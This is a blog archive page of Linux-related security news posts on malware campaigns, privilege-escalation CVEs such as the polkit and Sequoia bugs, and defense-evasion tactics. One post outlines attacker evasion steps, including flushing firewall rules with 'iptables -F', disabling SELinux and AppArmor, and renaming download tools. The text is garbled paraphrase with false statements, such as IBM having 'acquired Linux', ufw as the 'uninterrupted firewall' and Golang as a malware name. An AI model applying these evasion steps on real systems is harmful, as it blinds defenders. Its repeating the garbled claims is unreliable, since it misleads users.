Search This Blog

Showing posts with label Linux. Show all posts

Malicious Linux Shell Scripts Used to Evade Defenses

 

Attackers' evasive methods stretch back to the times when base64 and other popular encoding schemes were utilized. 

New Linux shell script methods and techniques are being used by attackers today to deactivate firewalls, monitor agents, and change access control lists (ACLs). The common evasive shell-script techniques are: 

1.Uninstalling monitoring agents 
Monitoring agents are software elements that track the system's process and network activity on a regular basis. The monitoring agents also produce various logs, which are useful during an incident probe. 

The malicious script, discovered in the osquery-based sandbox, attempts to uninstall the cloud-related monitoring agent Aegis (Alibaba Cloud threat detection agent) and terminate the Aliyun service. It also tries to uninstall YunJing, a host security agent from Tencent and BCM client management agent, which is generally installed on Endpoints for risk mitigation. 

2.Disabling Firewalls and Interrupts 
As a defensive measure, most systems and servers employ firewalls. As a defence evasive technique, the malicious software attempts to deactivate the firewall, i.e., uninterrupted firewall (ufw). In addition, attackers delete iptables rules (iptables -F), which are commonly used on Linux computers and servers for controlling firewall rules. 

The instructions were also exploited by attackers to deactivate non-maskable Interrupts (nmi). Watchdog is a configurable timer system that creates an interruption when a certain condition and time are met. The nmi watchdog interrupt handler would stop the process that caused the system to freeze in the case of a system freeze. To get over this defense, attackers disable the watchdog feature using the sysctl command or temporarily disabling it by setting the value to ‘0’. 

3.Disabling Linux Security Modules (LSMs) 
Security components such as SElinux and Apparmor are also disabled by the malicious shell script. These modules are used to establish MAC policies (mandatory access control). These modules might be easily configured by a server administrator to give users restricted access to the system's installed or running programs. 

-AppArmour: AppArmour is a Linux security feature that allows users to lock down apps such as Firefox for added protection. In Ubuntu's default setup, a user can restrict a program by granting it limited permissions. 

- SElinux: SElinux is a Linux security feature that allows a security administrator to deploy security context to certain apps and services. The shell is blocked or limited on various web servers, therefore RCE (Remote Code Execution) attackers generally bypass/disable it. 

4.Modifying ACLs 
The guidelines for granting rights on files and utilities are contained in ACLs, or Access Control Lists. ACLs on filesystems notify operating systems which users are authorized to access the system and what rights they possess. In Linux, the setfacl program is used to change and remove ACLs. 

5.Changing Attributes 
In Linux, the chattr is used to set and unset various characteristics of a file. Attackers use this to protect their own dropped files or to make their files permanent so that they can't be deleted by a user.

6.Renaming common utilities 
Common utilities like wget and curl were utilized with various names in one of the malicious scripts. These programs are often used to acquire files from a distant IP address. These tools are used by attackers to download malicious files from C2. 

If wget and curl are used under different names, some security systems that track the precise names of the utilities may not trigger the download event. 

-EDR Detections by Uptycs 
These malicious scripts were discovered with a threat level of 10/10 by Uptycs EDR using YARA process scanning. 

As attackers employ more complex and new techniques of evasion, it's more vital than ever to keep track of and document what's going on in the system. As per the Threat Post, the following suggestions are recommended: 

-Monitor suspicious processes, events, and network traffic that result from the execution of any untrusted binary on a regular basis.
-Keep your systems and firmware up to date with the most recent fixes and releases.

LemonDuck Targets Windows and Linux Systems

 

Initially, it was mainly a crypto-monetary botnet that allowed machine mining but later a transformation was initiated to make it a malware loader, bringing us to Microsoft's current update on this malevolent digital duck loaded with citrus. 

Microsoft warns users that LemonDuck's crypto-mining malware is aimed at both Windows and Linux, and distributes itself by phishing, exploiting, USB, and brute-force operations and attacks that exploit a serious vulnerability on the Exchange Server detected in March. 

In May, two years after the first bug appeared, the organization was found to be employing Exchange bugs for cryptocurrencies mining. 

Notably, throughout the period where security teams concentrate on correcting severe faults, and even eradicating competing spyware, the group behind LemonDuck makes use of high-profile weaknesses to protect the security system. 

The repercussions may be grave if one is attacked by the LemonDuck. Thus according to Microsoft, LemonDuck's capabilities include the robbing of key Windows and Linux PC credentials as well as the removal of security controls that make the system defenseless; email spreading (probably spearphishing attempts); and the reinstallation in devices to facilitate further execution of remote code (RCE) through back doors. 

Malware research teams from Cisco's Talos have indeed scoped the group's exchange activity. They observed that before loading payloads such as the Cobalt strike pentesting kit, a popular lateral movement tool, LemonDuck was utilizing automated tools to scan, detect, and exploit server software, which allows the malware to download additional modules. 

Microsoft post on the matter says, “(LemonDuck) uses a wide range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others — and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using Covid-19-themed lures in email attacks. In 2021, it exploited newly patched Exchange Server vulnerabilities to gain access to outdated systems." 

It is also revealed by Microsoft that although the attackers have initially predominantly focused on China, India is now in the top ten countries most afflicted by this malware. Precisely, India is among the six top countries targeted by cybercriminals alongside the USA, Russia, China, Germany, and Great Britain, with production and IoT businesses being the main targets. 

The risk is also heightened by the expanding malware architecture, which makes the cybersecurity sector even more vulnerable to these attacks. 

The usage of LemonCat, a distinct yet equally harmful and highly developed focused malware tool often used to install backdoors in systems through RCE attacks, is also mentioned by Microsoft. 

Further, Microsoft’s threat intelligence team states, “The threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks."

New Windows and Linux Flaws: Provide Attackers Highest System Privileges

 

Two new vulnerabilities, one in Windows and the other in Linux, were discovered on Tuesday, allowing hackers with a presence in a vulnerable machine to circumvent OS security limits and access critical resources. 

Microsoft's Windows 10 and upcoming Windows 11 versions have been discovered to be vulnerable to a new local privilege escalation vulnerability that allows users with low-level permissions to access Windows system files, permitting them to decrypt private keys and uncover the operating system installation password. The vulnerability has been named "SeriousSAM".

CERT Coordination Center (CERT/CC) stated in a vulnerability note published, "Starting with Windows 10 build 1809, non-administrative users are granted access to SAM, SYSTEM, and SECURITY registry hive files. This can allow for local privilege escalation (LPE)." 

The operating system configuration files in question are as follows - 

c:\Windows\System32\config\sam 
c:\Windows\System32\config\system 
c:\Windows\System32\config\security 

Microsoft acknowledged the vulnerability, which has been assigned the number CVE-2021-36934 but is yet to offer a patch or provide a timeframe for when a fix will be released. 

The Windows makers explained, "An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” 

However, successful exploitation of the issue implies that the attacker has already gained a foothold and has the capacity to execute code on the target machine. In the meanwhile, users should restrict entry to sam, system, and security files and erase VSS shadow copies of the system disc, according to the CERT/CC. 

Since the release of Patch Tuesday updates on July 13, this is also the third publicly documented unpatched issue in Windows. Apart from CVE-2021-36934, two other vulnerabilities in the Print Spooler component have been identified, leading Microsoft to advise all users to halt and terminate the service to protect their computers from exploitation. 

"Sequoia" privilege escalation flaw affected Linux distros:

Remediations have been issued for a security shortcoming affecting all Linux kernel versions from 2014 that can be exploited by malicious users and malware already deployed on a system to gain root-level privileges. 

The vulnerability, nicknamed "Sequoia" by Qualys researchers, has been issued the identifier CVE-2021-33909 and affects default Ubuntu 20.04, Ubuntu 20.10, Ubuntu 21.04, Debian 11, and Fedora 34 Workstation installations. The issue also affects Red Hat Enterprise Linux versions 6, 7, and 8. 

The vulnerability is a size t-to-int type conversion flaw in the Linux Kernel's "seq file" file system interface, which allows an unprivileged local intruder to generate, install, and delete a deep directory structure with a total path length of more than 1GB, resulting in a privilege escalation on the vulnerable host. 

According to Qualys, unprivileged attackers could use a stack exhaustion denial-of-service vulnerability in the system (CVE-2021-33910) to corrupt the software suite and induce a kernel panic.

Cybercriminals Unleashing Malware for Apple M1 Chip

 

Apple Macs are becoming more popular in the workplace, and the number of malware variants targeting macOS is increasing as well. However, the M1, Apple's new system-on-a-chip, has produced a new generation of macOS-specific malware that anti-malware tools, threat hunters, and researchers must swiftly learn to recognize and, eventually, fight. Historically, most macOS malware has been reused from Windows malware variants. But when employees built up home offices as a result of the pandemic's shift to work-from-home, more Macs entered the industry, making them a more valuable target for attackers targeting enterprises. 

Apple's new ARM64-based microprocessor, the M1, has already witnessed an increase in malware types created expressly for it, according to Mac security specialist Patrick Wardle. "As attackers evolve and change their ways, we as malware analysts and security researchers need to stay abreast of that as well.” In 2020, around half of all macOS malware, such as adware and nation-state attack code, may have migrated from Windows or Linux. 

M1 offers faster and more efficient processing, graphics, and battery life, and is now available in Apple's new Macs and iPad Pro. It also has several new built-in security mechanisms, such as one that protects the computer from remote exploitation and another that protects physical access. 

According to a recent Malwarebytes survey, Windows malware detections are down 24% among business users, while Mac malware detections are up 31%. Wardle discovered in his research that when he separated the binaries for macOS malware into two categories, one for Intel-based Macs and the other for M1-based Macs, anti-malware systems detected the Intel-based malware more successfully than the M1-based malware, despite the fact that the binaries are "logically the same." 

For the M1 malware, their detection rate dropped by 10%. That's a clue, he says, that existing antivirus signatures are mostly for the Intel edition of the macOS malware, rather than the M1 variant. Because static analysis alone can fail, detections should also use behavior-based technology. 

It's a matter of honing malware analysts' and threat hunters' skills to the new Apple silicon, he says. With reverse-engineering abilities and an awareness of the ARM64 instruction set, he says he wants to "empower Mac analysts, red teams, and everyone in cybersecurity." Wardle says, "The M1 system actually does significantly improve security at the hardware level, but it's transparent to the everyday user."

GitHub Releases Key Findings of an Easy-to-Exploit Linux flaw

 

Kevin Backhouse, a researcher at GitHub Security Lab revealed the details of an easy-to-exploit Linux flaw that can be exploited to escalate privileges to root on the targeted system. The vulnerability, classified as highly critical and termed as CVE-2021-3560, affects polkit, a system service installed by default on many Linux distributions.

On Thursday, Kevin published a blog post explaining his findings, as well as a short video detailing the exploit in polkit. A local, unprivileged attacker can use the flaw to escalate privileges to root with only a few commands executed in the terminal. 

Security researchers have admitted the vulnerability termed CVE-2021-3560 impacts some versions of Red Hat Enterprise Linux, Fedora, Debian, and Ubuntu. On June 3, a patch for CVE-2021-3560 was released. 

“The bug I found was quite old. It was introduced seven years ago in commit bfa5036 and first shipped with polkit version 0.113. However, many of the most popular Linux distributions didn’t ship the vulnerable version until more recently,” Backhouse stated.

“The bug has a slightly different history on Debian and its derivatives (such as Ubuntu) because Debian uses a fork of polkit with a different version numbering scheme. In the Debian fork, the bug was introduced in commit f81d021 and first shipped with version 0.105-26. The most recent stable release of Debian, Debian 10 (“buster”), uses version 0.105-25, which means that it isn’t vulnerable, ”Backhouse further added. 

Polkit is a system service developed for controlling system-wide privileges, creating a way for non-privileged processes to communicate with privileged processes. Backhouse described it as a service that plays the role of a judge, determining whether an action initiated by a user — specifically one that requires higher privileges — can be carried out directly or requires additional authorization, such as entering a password.

The vulnerability identified by the researcher is easy to manipulate, with just a few commands in the terminal. However, due to some timing requirements, it normally takes a few attempts for the exploit to be successful.

CVE-2021-3560 allows an unprivileged local hacker to gain root privileges. It’s very simple and quick to exploit, so users must update their installations as quickly as possible. Any system that has polkit version 0.113 (or later) installed is vulnerable. That includes popular distributions such as RHEL 8 and Ubuntu 20.04.

Linux System Service Bug Allows You to Gain Root Access

 

An authentication bypass vulnerability in the polkit auth system service, which is installed by default on many recent Linux distributions, allows unprivileged attackers to gain a root shell. On June 3, 2021, the polkit local privilege escalation flaw (CVE-2021-3560) was officially identified, and a fix was released. Polkit is used by systemd, hence it's included in any Linux distribution that uses systemd. 

Kevin Backhouse, a GitHub security researcher, detailed how he discovered the bug (CVE-2021-3560) in a systemd service called polkit in a blog post on Thursday. The problem, which was first introduced in commit bfa5036 seven years ago and first shipped in polkit version 0.113, took various pathways in different Linux distributions. Despite the fact that many Linux distributions did not ship with the vulnerable polkit version until recently, any Linux machine with polkit 0.113 or later installed is vulnerable to attacks. 

Polkit, formerly known as PolicyKit, is a service that determines whether certain Linux tasks require more privileges than there are currently available. It comes into play when you want to establish a new user account, for example. According to Backhouse, exploiting the issue is shockingly simple, needing only a few commands utilizing common terminal tools such as bash, kill, and dbus-send. 

"The vulnerability is triggered by starting a dbus-send command but killing it while polkit is still in the middle of processing the request," explained Backhouse. Polkit asks for the UID of a connection that no longer exists, therefore killing dbus-send — an interprocess communication command – in the middle of an authentication request creates an error (because the connection was killed). 

"In fact, polkit mishandles the error in a particularly unfortunate way: rather than rejecting the request, it treats the request as though it came from a process with UID 0," explains Backhouse. "In other words, it immediately authorizes the request because it thinks the request has come from a root process."

Because polkit's UID query to the dbus-daemon occurs numerous times throughout different code paths, this doesn't happen all of the time. According to Backhouse, those code pathways usually handle the error correctly, but one is vulnerable, and if the disconnection occurs while that code path is running, privilege escalation occurs. It's all about timing, which varies in unanticipated ways due to the involvement of various processes. Backhouse believes the bug's intermittent nature is why it went unnoticed for seven years.

Linux, MacOS Malware Hidden in Fake Browserify NPM Package

 

Over the course of the weekend, Sonatype's automated malware detection system spotted a serious exceptional malware sample published to the NPM registry. NodeJS engineers working with Linux and Apple macOS operating systems were targeted by a brand-new malicious package recognized on the NPM (Node Package Manager) registry. The malignant package, named "web-browserify" looks like the well-known Browserify NPM component which has been downloaded in excess of 160 million times all through its lifecycle, with over 1.3 million weekly downloads on NPM alone, being utilized by 356,000 GitHub repositories. 

Evidently, the malignant component has been downloaded around 50 times before it was taken out from the NPM within two days of its publishing. The package, made by a pseudonymous creator portraying themselves to be Steve Jobs, consolidates many approved open-source components and executes extensive surveillance actions on a contaminated system. Besides, up to this point, none of the main antivirus engines had the option to identify the ELF malware contained with the component. The way that it utilizes genuine software applications to perform dubious exercises could be one of the reasons. 

Browserify's fame comes from it being an open-source JavaScript instrument that permits developers to write cross-platform, NodeJS-style modules that gather for use in the browser. The distinction between the authentic Browserify and the phony one is that the latter abuses legitimate NPM components to bundle inside a malicious, hard to notice Linux and Mac executable. 

The malignant bundle incorporates a manifest file, package.json, a postinstall.js script, and an ELF executable called "run" existing in a compressed archive, run.tar.xz inside the npm component. When a developer is installing the package, the scripts pull out and start the "run" Linux binary from the archive, which demands elevated or root permissions from the user. The extracted "run" binary is immense, around 120 MB in size, and bundles inside itself hundreds of legitimate NPM components. The malware is made totally from open source components and uses these genuine components to organize its extensive surveillance activities. 

The cross-platform “sudo-prompt” module is one of these components and is used by "run" to provoke the client into permitting the malware root privileges on both macOS and Linux distributions.

Google Issues a Warning about Spectre Attacks using JavaScript

 

It's been over a long time since researchers uncovered a couple of security vulnerabilities, known as Spectre and Meltdown, that further revealed fundamental flaws in how most present-day PC processors handle the information to maximize efficiency. While they influence a cosmic number of computing devices, the so-called speculative execution bugs are generally hard to misuse in practice. However, presently researchers from Google have built up a proof-of-concept that shows the risk Spectre assaults pose to the browser—in hopes of motivating a new generation of defenses. 

Google in 2018 detailed two variations of Spectre, one of which – named variation 1 (CVE-2017-5753) – concerned JavaScript exploitation against browsers. Google released the PoC for engineers of web applications to comprehend why it's critical to send application-level mitigations. At a high level, as detailed in a Google document on W3C, a developer's "data must not unexpectedly enter an attacker's process". 

While the PoC shows the JavaScript Spectre assault against Chrome 88's V8 JavaScript engine on an Intel Core i7-6500U 'Skylake' CPU on Linux, Google notes it can without much of a stretch be changed for different CPUs, browser versions, and operating systems. It was even successful on Apple's M1 Arm CPU with minor alterations. The assault can leak information at a pace of 1kB each second. The chief components of the PoC are a Spectre version 1 "device" or code that triggers attacker-controlled transient execution, and a side-channel or "a way to observe side effects of the transient execution". 

"The web platform relies on the origin as a fundamental security boundary, and browsers do a pretty good job at preventing explicit leakage of data from one origin to another," explained Google's Mike West. "Attacks like Spectre, however, show that we still have work to do to mitigate implicit data leakage. The side-channels exploited through these attacks prove that attackers can read any data which enters a process hosting that attackers' code. These attacks are quite practical today, and pose a real risk to users."

Google has likewise released another prototype Chrome extension called Spectroscope that scans an application to discover assets that may require enabling additional defenses.

A Trio of Vulnerabilities in the Linux Kernel Can Give Attackers Root Privileges

 

Linux kernel distributions appear explicitly susceptible to recently uncovered vulnerabilities. In the iSCSI module, which is used for viewing shared data storages, three unearthed vulnerabilities in the Linux kernel would provide administrative privileges to anybody with a user account. Since 2006, the Linux code has no identification of the trio of defects – the CVE-2021-27363, CVE-2021-27364, and CVE-2021-27365 – until GRIMM researchers found them. 

“If you already had the execution on a box, either because you have a user account on the machine, or you’ve compromised some service that doesn’t have repaired permissions, you can do whatever you want basically,” said Adam Nichols, principal of the Software Security practice at GRIMM. 

Although the vulnerabilities that are in code, are not functional remotely, therefore they are not remote exploits but are still troubling. They take “any existing threat that might be there. It just makes it that much worse,” he explained. Referring to the concept that "many eyes make any bug shallow," Linux code doesn't get many eyes so that it seems perfect. But while the code was first published, the bugs have been there, even in the last fifteen years they haven't really modified. 

GRIMM researchers, of course, are trying to dig in to see how often vulnerabilities occur where possible – with open source, a much more feasible solution. It's very much related to the extent of the Linux kernel that the defections drifted away. "It gotten so big," Nichols said, "there's so much code there." “The real strategy is making sure you’re loading as little code as possible.” 

Nichols said that bugs are present in all Linux distributions, but kernel drivers are not enabled by default. If the vulnerable kernel module can be loaded by a regular user or not, may vary. For example, they could be checked by GRIMM in all Red Hat distros. "Even though it's not loaded by default, you can load it and you can exploit it without any trouble," added Nichols. 

Although the hardware is present, other systems such as Debian and Ubuntu “are in the same boat as Red Hat, where the user, depending on what packages are installed, can coerce it into getting loaded; then it’s there to be exploited,” he said. Errors are reported in 5.11.4, 5.10.21, 5.4.103, 4.19.179, 4.14.224, 4.9.260, and 4.4.260. The bugs are not included in the following updates. Although all the old kernels are end-of-life and will not be patched. 

Nichols suggests that the Kernel must be blacklisted as a temporary measure to neutralize defects. “Any system that doesn’t use that module can just say never load this module under any circumstances, and then you’re kept safe,” he said. But “if you’re actually using iSCSI, then you wouldn’t want to do that.”

Ezuri Crypter Being Used to Evade Antivirus Detection

 

As per a report delivered by AT&T Alien Labs, various cyber criminals are utilizing Ezuri crypter to pack their malware and dodge antivirus detection. Although Windows malware has been known to deploy similar tactics, cybercriminals are currently utilizing Ezuri for penetrating Linux systems too. Written in Golang, Ezuri acts both as a crypter and loader for ELF (Linux) binaries. Utilizing AES, it encrypts the malware code and, on decoding, executes the noxious payload directly inside memory without producing any records on the disk. 

Systems engineer and Ezuri's maker, Guilherme Thomazi Bonicontro ('guitmz'), had open-sourced the ELF loader on GitHub in 2019 and debuted the tool in his blog entry. In an email interview with, Bonicontro otherwise known as TMZ shared that he is a malware researcher and makes research apparatuses for spreading awareness and aiding defenders. 

“I'm an independent malware researcher, I do this as one of my leisure activities. The objective of my work is just to learn and bring awareness on assorted PoC assault and defense techniques, yet never bring on any harm. As a general guideline, I generally share samples of my ventures with antivirus organizations and I never discharge code with ruinous payload or anything with refined replication capabilities. I believe knowledge ought to be available to everybody and every individual ought to be answerable for their own activities to rest soundly at night,” said Bonicontro. 

Researchers Ofer Caspi and Fernando Martinez of AT&T Alien Labs noted in the wake of decrypting the AES-encrypted payload, Ezuri quickly passes the subsequent code to the runFromMemory work as a contention without dropping malware files anyplace on the tainted system. During the last few months, Caspi and Martinez distinguished a few malware creators that pack their samples with Ezuri. These incorporate the cybercrime group, TeamTnT, active since at least April 2020. 

TeamTnT is known to assault misconfigured Docker instances and exposed APIs to transform weak systems into DDoS bots and crypto miners. Later variations of TeamTnT's malware, for example, "Black-T" that install network scanners on tainted systems and extract AWS credentials from memory were likewise discovered to be bound with Ezuri. As indicated by the AT&T researchers, "the last Black-T sample distinguished by Palo Alto Networks Unit42 is really an Ezuri loader." The researchers additionally saw the presence of the 'ezuri' string in numerous Ezuri-packed binaries. 

Malware samples which were commonly distinguished by about 50% of antivirus engines on VirusTotal, yielded 0 detections when encoded with Ezuri, at the time of AT&T's research. Even today, the Ezuri-stuffed sample has less than a 5% detection rate on VirusTotal.

'InterPlanetary Storm' Botnet Now Targeting MAC and IoT Devices


First discovered in 2019, the InterPlanetary Storm malware has resurfaced with a new variant targeting Mac and Android along with Windows and Linux machines, as per the findings by researchers at IT security firm, Barracuda Networks.

The malware is known as ‘InterPlanetary Storm’ as it makes use of InterPlanetary File System (IFES) peer-to-peer (p2p) network - using a legitimate p2p network makes it difficult to identify the malicious traffic because it gets intermixed with legitimate traffic. The malware targets Windows machines and lets the attacker execute any arbitrary PowerShell code on the compromised systems.

“The malware detects the CPU architecture and running OS of its victims, and it can run on ARM-based machines, an architecture that is quite common with routers and other IoT devices,” the researchers noted.

The earlier versions of the Interplanetary Storm malware that surfaced in May 2019 compromised Windows-based devices, however, by June 2019; the botnet could also infect Linux machines. The new versions with add-on capabilities attempt to infect machines via a dictionary attack, it’s a form of brute force attack technique that involves breaking into a password-protected system by systematically guessing passwords. The most recent version detected in August is configured to infect Mac along with IoT devices like televisions running the Android OS, as per a report published on Thursday by Barracuda Networks.

In the report, Erez Turjeman, a researcher with Barracuda, says, "The malware detects the CPU architecture and running OS of its victims, and it can run on ARM-based machines, an architecture that is quite common with routers and other [internet of things] devices.” "The malware is called InterPlanetary Storm because it uses the InterPlanetary File System (IPFS) p2p network and its underlying libp2p implementation," the report further notes.

"This allows infected nodes to communicate with each other directly or through other nodes (i.e., relays).”

The malware was found building a botnet that has infected approximately 13,000 devices in 84 different countries worldwide including the U.S., Brazil, Europe, and Canada. However, the majority of targets were based in Asia constituting a total of 64%. Infections found in South Korea, Taiwan, and Hong Kong amounted to a total of 59%. Russia and Ukraine constituted 8% to the total and United States and Canada did 5%. Rest, China and Sweden constituted 3% each.

Golang: A Cryptomining Malware that Maybe Targetting Your PC


Cybersecurity experts at Barracuda Networks have discovered a unique kind of crypto mining malware called "Golang." The malware can attack Windows as well as Linux systems, according to the experts. This latest malware is targeting Monero cryptocurrency with the help of Xmrig, a popular miner. The number of attacks related to the malware may be relatively low, but the cybersecurity experts have discovered 7 IP addresses associated with this malware, all originating from China.


The experts also observed that the Golang malware's primary targets are non-HTTP features like MSSQL and Redis, app servers, web apps frameworks, whereas easy to attack targets like end-users are safe. If we look back into the issue, we will find that the earlier versions of Golang only affected the Linux systems; however, the present version targets Windows and the former. The attacks are carried out using various exploits such as IoT devices, Hadoop, Drupal, ElasticSearch, and Oracle Weblogic. For instance, in a recent malware attack in China, the malware used exploits that targeted ThinkPHP app frameworks widely used in the country.

According to the experts, the Golang malware is capable of evolving every day and using more exploits as each day passes by. Golang malware works by infiltrating the system, and once it does, it uses required files to complete the task. These may include downloaded update scripts, configuration files, scanner, and a miner. It all depends on the type of platform. Whereas, when attacking Windows, the hackers can use backdoors too. In recent times, more and more hackers have shifted towards using Golang as it can't be identified by anti-virus software.

The malware is infamous for targeting vulnerable servers, making it accessible among cybercriminals looking for vulnerabilities to exploit. The only way to be safe from this malware is to keep track of the CPU usage activity (when it goes unusually high) and observe any suspicious activity at the endpoints. Any threat, similar to the likes of Golang, can be avoided by vigilante inspections and immediate responses. Awareness about crypto mining threats is also a must.

Can open source software be bought?


Open-source softwares (OSS) are released under a special license that makes its source code available to the user to inspect, use, modify and enhance. It is a misunderstood term that these are not copyrighted, instead, they are copyrighted under a license that lets it users study, change and use its source code or services (depending upon the software) for commercial use. Some of the common open source softwares are Linux, Red Hat, Ubuntu, GitHub, FreeBSD, and fedora.


Just five years ago the tech world was quite critical and skeptical of open source softwares with Microsoft CEO Steve Ballmer calling Linux as 'cancer' and open source software as 'a communist threat' but OSS since then have come a long way with the success of Red Hat and Linux. Open source has given a silver lining to the underdog developers and defied the monopoly of tech giants giving power to small businesses and individuals to grow using their open-source code.

But what the open-source devotees don't know or don't stress on is that open source softwares can be bought and acquired by other commercial companies. The fix being that if they are open source how could they be bought, but even these have copyrights that can be bought and changed to closed source. And these OSS (open source softwares) are being acquired by lightning speed- IBM acquired Linux and Red Hat. Microsoft is portraying itself as "the open-source leader" by joining the  Open Invention Network (OIN) and acquiring GitHub.

Now, there are advantages if big companies take over these open-source software as these were not established with a business model and will run out but if companies like these buy out OSSs they can stay afloat and provide for their customers. But there's also a dark side to these acquisitions as these could mean the end of open source. With their rights sold, these open-source rights could be closed and their free service comes to an end. Though those who have used the open-source would not be affected as it is already licensed but any future version of the software could be closed.

Now, Microsoft says that “Microsoft is all-in on open source, we have been on a journey with open source, and today we are active in the open-source ecosystem, we contribute to open-source projects, and some of our most vibrant developer tools and frameworks are open source.” the same goes for IBM's Linux but these are big and popular software but what about small software with less distributes and copyrights, the dark cloud still hovers over them.

Hackers Attack Amazon Web Services Server


A group of sophisticated hackers slammed Amazon Web Services (AWS) servers. The hackers established a rootkit that let them manually command the servers and directed sensitive stolen corporate date to its home servers C2 (command and control). The attackers breached a variety of Windows and Linux OS within the AWS data center. A recent report published by Sophos (from Britain) last week has raised doubts and suspicions among the cybersecurity industry.


According to Sophos reports, the hackers were able to avoid Amazon Web Services SG (security groups) easily. Security Groups are supposed to work as a security check to ensure that no malicious actor ever breaches the EC2 instance (it is a virtual server used by AWS to run the application). The anonymous victim of this attack had already set up a perfectly tuned SG. But due to the rootkit installed in AWS servers, the hackers obtained remote access meanwhile the Linux OS was still looking for inbound connections, and that is when Sophos intervened. Sophos said that the victim could have been anyone, not just the AWS.

The problem was not with AWS, this piggybacking method could have breached any firewall, if not all. According to cybersecurity experts' conclusion, the hackers are likely to be state-sponsored. The incident is named as "Cloud Snooper." A cybersecurity expert even termed it as a beautiful piece of work (from a technical POV). These things happen all the time, it only came to notice because it happened with a fancy organization, he says. There are still unanswered questions about the hack, but the most important one that how the hackers were able to manage this attack is cleared.

About the attack 

“An analysis of this system revealed the presence of a rootkit that granted the malware’s operators the ability to remotely control the server through the AWS SGs. But this rootkit’s capabilities are not limited to doing this in the Amazon cloud: It also could be used to communicate with, and remotely control, malware on any server behind any boundary firewall, even an on-premises server. By unwinding other elements of this attack, we further identified other Linux hosts, infected with the same or a similar rootkit," said Sophos.

Skidmap, Linux Malware Mining Cryptocurrency in Disguise



A new strain of Linux malware has been discovered by security researchers, which is configured to carry out a multitude of malicious activities besides just illegally mining cryptocurrency; by using a "secret master password" it provides hackers the universal access to the system.

Skidmap, Linux malware demonstrates the increased convolutions in Cryptocurrency mining malware and prevalence of the corresponding threats.

In order to carry out its cryptocurrency mining in disguise, Skidmap forges CPU-related statistics and network traffic, according to TrendMicro's recent blog on the subject.

Highlighting the advanced methods used by Skidmap, researchers at TrendMicro said, "Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware."

“Cryptocurrency-mining threats don’t just affect a server or workstation’s performance — they could also translate to higher expenses and even disrupt businesses especially if they are used to run mission-critical operations,” reads the blog.

How the infection takes place?

It starts in 'crontab', which is a standard Linux process responsible for periodically scheduling timed tasks in Unix-like systems. After that, Skidmap installs various malicious binaries and then the security settings of the affected machine are being minimized to start the cryptocurrency mining smoothly.

As the cryptocurrency miners generate digital money for the hackers, they are being monitored by some additional binaries put into the system for the same.

To stay guarded against the aforementioned Cryptocurrency mining malware, admins are advised to update and patch their servers and machines ,and be alert to unverified repositories.

Undetected malware attacks Linux systems

A new sophisticated, unique Linux malware dubbed HiddenWasp used in targeted attacks against victim’s who are already under attack or gone through a heavy reconnaissance.

The malware is highly sophisticated and went undetected; the malware is still active and has a zero detection rate. The malware adopted a massive amount of codes from publically available malware such as Mirai and the Azazel rootkit.

Unlike Windows malware, Linux malware authors won’t concentrate much with evasion techniques, as the trend of using Anti-Virus solutions in Linux machine is very less when compared to other platforms.

However, the Intezer report shows “malware with strong evasion techniques does exist for the Linux platform. There is also a high ratio of publicly available open-source malware that utilizes strong evasion techniques and can be easily adapted by attackers.” In the past, we saw many malware focussed on crypto-mining or DDoS activity, but the HiddenWasp is purely a targeted remote control attack.

The malware is composed of a user-mode rootkit, a trojan, and an initial deployment script. Researchers spotted the files went undetected in VirusTotal and the malware hosted in servers of a hosting company ThinkDream located in Hong Kong.

While analyzing scripts, Intezer spotted a user named ‘sftp’ and hardcodes, which can be used for initial compromise and also the scripts has variable to clear the older versions from the compromised systems.

The scripts also include variables to determine server architecture of the compromised system and download components from the malicious server based on the compromised server architecture. Once the components installed, the trojan will get executed on the system.

“Within this script, we were able to observe that the main implants were downloaded in the form of tarballs. As previously mentioned, each tarball contains the main trojan, the rootkit, and a deployment script for x86 and x86_64 builds accordingly.”

StealthWorker: Manipulates Compromised E-Commerce Websites To Attack Windows and Linux Platforms




A new brute-force malware which goes by the name of StealthWorker was recently uncovered. This malware allegedly uses compromised e-commerce websites to steal personal data.

The platforms that have majorly been affected by this malware are Linux and windows.

Personal information and payment data are the basic motivations behind these malware attacks.

The malware is written in a very unique and rarely used language “Golang” which is already being used by the Mirai botnet development module.

To make all this happen the e-commerce websites are first compromised by employing an embedded skimmer.

The vulnerabilities of the websites are manipulated by either battering the plugin vulnerabilities or making use of a Content Management System (CMS).

The malware emerged while the researchers were analyzing the command and control server (5.45.69[.]149).

That’s where they found the storage directory with samples intending to brute force a source admin tool.

There have been previous versions of this malware which had only windows on their radar.

But the latest version happens to have server payload binaries to get into Linux as well.

One of the samples that the researchers were working on is “PhpMyAdminBrut_Windows_x86.exe” where an IP was found which led to a web panel login with an array of new samples.

Some open directories were also found which comprised of new file names which indicated towards IoT devices with ARM and Mips structures.

StealthWorker works on a routine execution to ensure that the malware stays even after the system’s rebooted.

The researchers also used the IDA python script to look for other f malicious functions.

Out of research it was also found out that other platforms and services are also on the target list namely, FTP, Joomla, cpanel, Mysql, SSH and others.

Furthermore, other major moves are also being made on the part of the cyber-cons towards infecting an extensive variety of platforms.

Hacker Group make Nintendo Switch a Linux machine

As reported earlier this month, Hacker Group fail0verflow had tweeted a picture showing that they had managed to run Linux on Nintendo Switch. That was February 6; now, 12 days later, they have released a video on their account, providing proof of the same.

The video shows a Switch console running a Linux-based desktop environment KDE Plasma, with full touchscreen support and a web browser, something which the gaming console did not originally have.


While usually people hack into gaming consoles to play cracked versions of games, some people just enjoy running whatever kind of software they want on them. This seems to be one of those cases.

Fail0verflow is a hacking group that focuses its hacking efforts on gaming consoles and has recently taken up Nintendo Switch, as have many others.

While the hacking group has still not made public their exact method and code, it reportedly involves exploiting a flaw in the boot ROM of the Switch’s Nvidia Tegra X1 chip. As they revealed last time, the video maintains that the flaw can’t be patched up by Nintendo on current devices but allegedly can be discussed in future production.

Fedora 16 Linux Released (Codename "Verne")



